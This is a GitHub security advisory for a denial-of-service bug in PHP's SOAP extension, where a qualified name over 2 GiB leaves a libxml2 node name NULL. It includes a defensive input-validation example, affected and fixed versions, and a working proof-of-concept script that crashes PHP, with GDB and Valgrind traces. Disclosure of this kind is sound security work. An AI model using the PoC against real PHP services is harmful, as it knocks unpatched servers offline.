GHSA-453j-q27h-5p8x

Published: Jul 3, 2025
Source: github
GitHub: not reviewed
CVSS3: 5.9

Description

NULL Pointer Dereference in PHP SOAP Extension via Large XML Namespace Prefix

Summary

If a SoapVar instance is created with a fully qualified name larger than 2G, this will cause a NULL pointer dereference resulting in a segmentation fault, leading to a denial of service.

Product: PHP <= 8.5.0-dev with libxml2 < 2.13

Discovered by: Ahmed Lekssays (Qatar Computing Research Institute).

Details

Libxml versions prior to 2.13 cannot correctly handle a call to xmlNodeSetName() with a name longer than 2G. It will leave the node object in an invalid state with a NULL name. This later causes a NULL pointer dereference when using the name during message serialization.

This can be exploited if a SoapVar is created with a fully qualified name that is longer than 2G. This would be possible if some application code uses a namespace prefix from an untrusted source like from a remote SOAP service.
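The advisory's root cause is a node name built from an unbounded, attacker-influenced prefix. The following is an added example (not part of the advisory and not php-src code) showing the input check an application would put in front of SoapVar when the prefix comes from an untrusted source: bound the length of each QName part and require it to be an NCName before the string is ever handed to the SOAP extension. The constant `MAX_QNAME_PART_LEN`, the helper names and the sample inputs are assumptions chosen for illustration; the check complements, and does not replace, upgrading to the fixed PHP versions listed below or to libxml2 2.13 or later.

```php
<?php
// Added example (not from the advisory or php-src): bound and validate a
// namespace prefix taken from an untrusted source before it reaches SoapVar.
// The limit and the helper names are assumptions chosen for illustration.

const MAX_QNAME_PART_LEN = 256; // assumed application-level bound; real prefixes are short

/**
 * Validate one part of a qualified name: it must be an XML NCName
 * (no colon, starts with a letter or underscore) and must stay far below
 * the ~2 GiB length at which libxml2 < 2.13 leaves the node name NULL.
 */
function assertNcName(string $part, string $what): void
{
    if (strlen($part) > MAX_QNAME_PART_LEN) {
        throw new InvalidArgumentException("$what exceeds " . MAX_QNAME_PART_LEN . " bytes");
    }
    // Conservative ASCII subset of the XML NCName production.
    if (!preg_match('/\A[A-Za-z_][A-Za-z0-9._-]*\z/', $part)) {
        throw new InvalidArgumentException("$what is not a valid NCName");
    }
}

/** Build a "prefix:local" node name only from validated parts. */
function buildSafeQName(string $prefix, string $localName): string
{
    assertNcName($prefix, 'namespace prefix');
    assertNcName($localName, 'local name');
    return "{$prefix}:{$localName}";
}

/** Wrap a value in a SoapVar whose node name has passed the checks above. */
function makeSoapVar(string $value, string $untrustedPrefix, string $localName): SoapVar
{
    // Same constructor arguments as the PoC, but the 5th one is now validated.
    return new SoapVar($value, XSD_STRING, null, null, buildSafeQName($untrustedPrefix, $localName));
}

// Constructed inputs: one well-formed prefix, one oversized prefix of the kind
// the advisory describes (shrunk here; the real trigger is ~2 GiB), one with
// a colon that would change the meaning of the QName.
$cases = [
    'ns1'                   => 'expected: accepted',
    str_repeat('A', 100000) => 'expected: rejected by length check',
    'bad:prefix'            => 'expected: rejected by NCName check',
];

foreach ($cases as $prefix => $expected) {
    try {
        makeSoapVar('value', $prefix, 'Element');
        echo "accepted prefix of length " . strlen($prefix) . " ($expected)\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: " . $e->getMessage() . " ($expected)\n";
    }
}
```

Run it with the SOAP extension loaded (`php -m | grep soap`). The length bound is the control that matters for this bug; the NCName check is added because a prefix containing a colon or leading digit would silently produce a different element name than the caller intended.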

PoC

Create a PHP file with the following content:

```php
<?php
ini_set('memory_limit', '6144M');

// 2 GB prefix to overflow int (INT_MAX = 2147483647)
$hugePrefix = str_repeat("A", 0x7fffffff);

// This is the local part of the XML name
$localName = "Element";

// This will be passed to xmlBuildQName(prefix: hugePrefix, ncname: localName)
$soapVar = new SoapVar(
    "value",
    XSD_STRING,
    null,
    null,
    "{$hugePrefix}:{$localName}" // Triggers xmlBuildQName
);

$options = [
    'location'   => 'http://127.0.0.1/', // localhost dummy
    'uri'        => 'urn:dummy',
    'trace'      => 1,
    'exceptions' => true,
];

try {
    $client = new SoapClient(null, $options);
    $client->__soapCall("DummyFunction", [$soapVar]);
} catch (Exception $e) {
    echo "Caught Exception: " . $e->getMessage() . "\n";
}
?>
```

Run with: php poc.php

The script will immediately crash with a segmentation fault. GDB shows the crash occurs in strcmp() with a null pointer dereference. Valgrind confirms "Invalid read of size 1 at address 0x0".

Impact

This is a null pointer dereference vulnerability (CWE-476) that affects any PHP installation with the SOAP extension enabled. The vulnerability can be triggered when a SoapVar is created with a qualified name based on user-controlled SOAP data.

Impact includes:

  • Denial of Service: Reliable crash causing PHP process termination
  • Service disruption: Affects web applications using SOAP functionality

GDB Trace

```
GNU gdb (Ubuntu 16.2-8ubuntu1) 16.2
Reading symbols from /usr/local/bin/php...
(gdb) b xmlBuildQName
Breakpoint 1 at 0x14b440
(gdb) run
Starting program: /usr/local/bin/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/aarch64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
__GI_strcmp () at ../sysdeps/aarch64/strcmp.S:78
(gdb) bt
#0  __GI_strcmp () at ../sysdeps/aarch64/strcmp.S:78
#1  0x0000aaaaaaf8e72c in serialize_zval (val=0xfffff76010f0, param=0x0, paramName=0xffffffffc738 "param0", style=1, parent=0xaaaaac484090) at /php-src/ext/soap/soap.c:4175
#2  0x0000aaaaaaf8e55c in serialize_parameter (param=0x0, param_val=0xfffff76010f0, index=0, name=0x0, style=1, parent=0xaaaaac484090) at /php-src/ext/soap/soap.c:4144
#3  0x0000aaaaaaf8ddc8 in serialize_function_call (this_ptr=0xfffff7614220, function=0x0, function_name=0xfffff765f6a8 "DummyFunction", uri=0xfffff765f798 "urn:dummy", arguments=0xfffff76010f0, arg_count=1, version=1, soap_headers=0x0) at /php-src/ext/soap/soap.c:4005
#4  0x0000aaaaaaf87794 in do_soap_call (execute_data=0xfffff7614200, this_ptr=0xfffff7614220, function=0xfffff765f690, arg_count=1, real_args=0xfffff76010f0, return_value=0xffffffffcfb8, location=0xfffff765f730, soap_action=0x0, call_uri=0xfffff765f780, soap_headers=0x0, output_headers=0x0) at /php-src/ext/soap/soap.c:2421
#5  0x0000aaaaaaf88164 in soap_client_call_common (this_ptr=0xfffff7614220, function=0xfffff765f690, args=0xfffff7659480, location=0x0, soap_action=0x0, uri=0x0, soap_headers=0x0, free_soap_headers=false, output_headers=0x0, execute_data=0xfffff7614200, return_value=0xffffffffcfb8) at /php-src/ext/soap/soap.c:2559
#6  0x0000aaaaaaf88664 in zim_SoapClient___soapCall (execute_data=0xfffff7614200, return_value=0xffffffffcfb8) at /php-src/ext/soap/soap.c:2651
#7  0x0000aaaaab286f9c in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER () at /php-src/Zend/zend_vm_execute.h:1992
#8  0x0000aaaaab317060 in execute_ex (ex=0xfffff7614020) at /php-src/Zend/zend_vm_execute.h:58962
#9  0x0000aaaaab31b918 in zend_execute (op_array=0xfffff7684000, return_value=0x0) at /php-src/Zend/zend_vm_execute.h:64385
#10 0x0000aaaaab3d23c0 in zend_execute_script (type=8, retval=0x0, file_handle=0xffffffffe840) at /php-src/Zend/zend.c:1943
#11 0x0000aaaaab13bea4 in php_execute_script_ex (primary_file=0xffffffffe840, retval=0x0) at /php-src/main/main.c:2594
#12 0x0000aaaaab13c030 in php_execute_script (primary_file=0xffffffffe840) at /php-src/main/main.c:2634
#13 0x0000aaaaab3d4c68 in do_cli (argc=2, argv=0xaaaaac2e5470) at /php-src/sapi/cli/php_cli.c:952
#14 0x0000aaaaab3d5bf8 in main (argc=2, argv=0xaaaaac2e5470) at /php-src/sapi/cli/php_cli.c:1363
```

Valgrind Trace

```
valgrind php poc.php
==23007== Memcheck, a memory error detector
==23007== Copyright (C) 2002-2024, and GNU GPL'd, by Julian Seward et al.
==23007== Using Valgrind-3.24.0 and LibVEX; rerun with -h for copyright info
==23007== Command: php poc.php
==23007==
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9c8c000) (defined)
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9c8c000) (noaccess)
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9e8b000) (defined)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x159e02000) (defined)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x159e02000) (noaccess)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x15a001000) (defined)
==23007== Invalid read of size 1
==23007==    at 0x488FE8C: strcmp (in /usr/libexec/valgrind/vgpreload_memcheck-arm64-linux.so)
==23007==    by 0x5F672B: serialize_zval (soap.c:4175)
==23007==    by 0x5F655B: serialize_parameter (soap.c:4144)
==23007==    by 0x5F5DC7: serialize_function_call (soap.c:4005)
==23007==    by 0x5EF793: do_soap_call (soap.c:2421)
==23007==    by 0x5F0163: soap_client_call_common (soap.c:2559)
==23007==    by 0x5F0663: zim_SoapClient___soapCall (soap.c:2651)
==23007==    by 0x8EEF9B: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1992)
==23007==    by 0x97F05F: execute_ex (zend_vm_execute.h:58962)
==23007==    by 0x983917: zend_execute (zend_vm_execute.h:64385)
==23007==    by 0xA3A3BF: zend_execute_script (zend.c:1943)
==23007==    by 0x7A3EA3: php_execute_script_ex (main.c:2594)
==23007==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23007==
==23007==
==23007== Process terminating with default action of signal 11 (SIGSEGV)
==23007==  Access not within mapped region at address 0x0
==23007==    at 0x488FE8C: strcmp (in /usr/libexec/valgrind/vgpreload_memcheck-arm64-linux.so)
==23007==    by 0x5F672B: serialize_zval (soap.c:4175)
==23007==    by 0x5F655B: serialize_parameter (soap.c:4144)
==23007==    by 0x5F5DC7: serialize_function_call (soap.c:4005)
==23007==    by 0x5EF793: do_soap_call (soap.c:2421)
==23007==    by 0x5F0163: soap_client_call_common (soap.c:2559)
==23007==    by 0x5F0663: zim_SoapClient___soapCall (soap.c:2651)
==23007==    by 0x8EEF9B: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1992)
==23007==    by 0x97F05F: execute_ex (zend_vm_execute.h:58962)
==23007==    by 0x983917: zend_execute (zend_vm_execute.h:64385)
==23007==    by 0xA3A3BF: zend_execute_script (zend.c:1943)
==23007==    by 0x7A3EA3: php_execute_script_ex (main.c:2594)
==23007==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23007==
==23007== HEAP SUMMARY:
==23007==     in use at exit: 2,512,339 bytes in 16,376 blocks
==23007==   total heap usage: 17,710 allocs, 1,334 frees, 3,078,295 bytes allocated
==23007==
==23007== LEAK SUMMARY:
==23007==    definitely lost: 27,168 bytes in 849 blocks
==23007==    indirectly lost: 40 bytes in 1 blocks
==23007==      possibly lost: 2,040,256 bytes in 13,322 blocks
==23007==    still reachable: 444,875 bytes in 2,204 blocks
==23007==         suppressed: 0 bytes in 0 blocks
==23007==
==23007== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
```

Packages

Name             Affected versions   Fixed version
(not specified)  < 8.1.33            8.1.33
(not specified)  < 8.2.29            8.2.29
(not specified)  < 8.3.23            8.3.23
(not specified)  < 8.4.10            8.4.10

EPSS

Percentile: 24%
0.00079
Low

5.9 Medium

CVSS3

Weaknesses

CWE-476

Related vulnerabilities

CVSS3: 5.9
ubuntu
21 days ago

In PHP versions:8.1.* before 8.1.33, 8.2.* before 8.2.29, 8.3.* before 8.3.23, 8.4.* before 8.4.10 when parsing XML data in SOAP extensions, overly large (>2Gb) XML namespace prefix may lead to null pointer dereference. This may lead to crashes and affect the availability of the target server.

CVSS3: 5.9
redhat
30 days ago

In PHP versions:8.1.* before 8.1.33, 8.2.* before 8.2.29, 8.3.* before 8.3.23, 8.4.* before 8.4.10 when parsing XML data in SOAP extensions, overly large (>2Gb) XML namespace prefix may lead to null pointer dereference. This may lead to crashes and affect the availability of the target server.

CVSS3: 5.9
nvd
21 days ago

In PHP versions:8.1.* before 8.1.33, 8.2.* before 8.2.29, 8.3.* before 8.3.23, 8.4.* before 8.4.10 when parsing XML data in SOAP extensions, overly large (>2Gb) XML namespace prefix may lead to null pointer dereference. This may lead to crashes and affect the availability of the target server.

CVSS3: 5.9
debian
21 days ago

In PHP versions:8.1.* before 8.1.33, 8.2.* before 8.2.29, 8.3.* before ...

suse-cvrf
11 days ago

Security update for php8
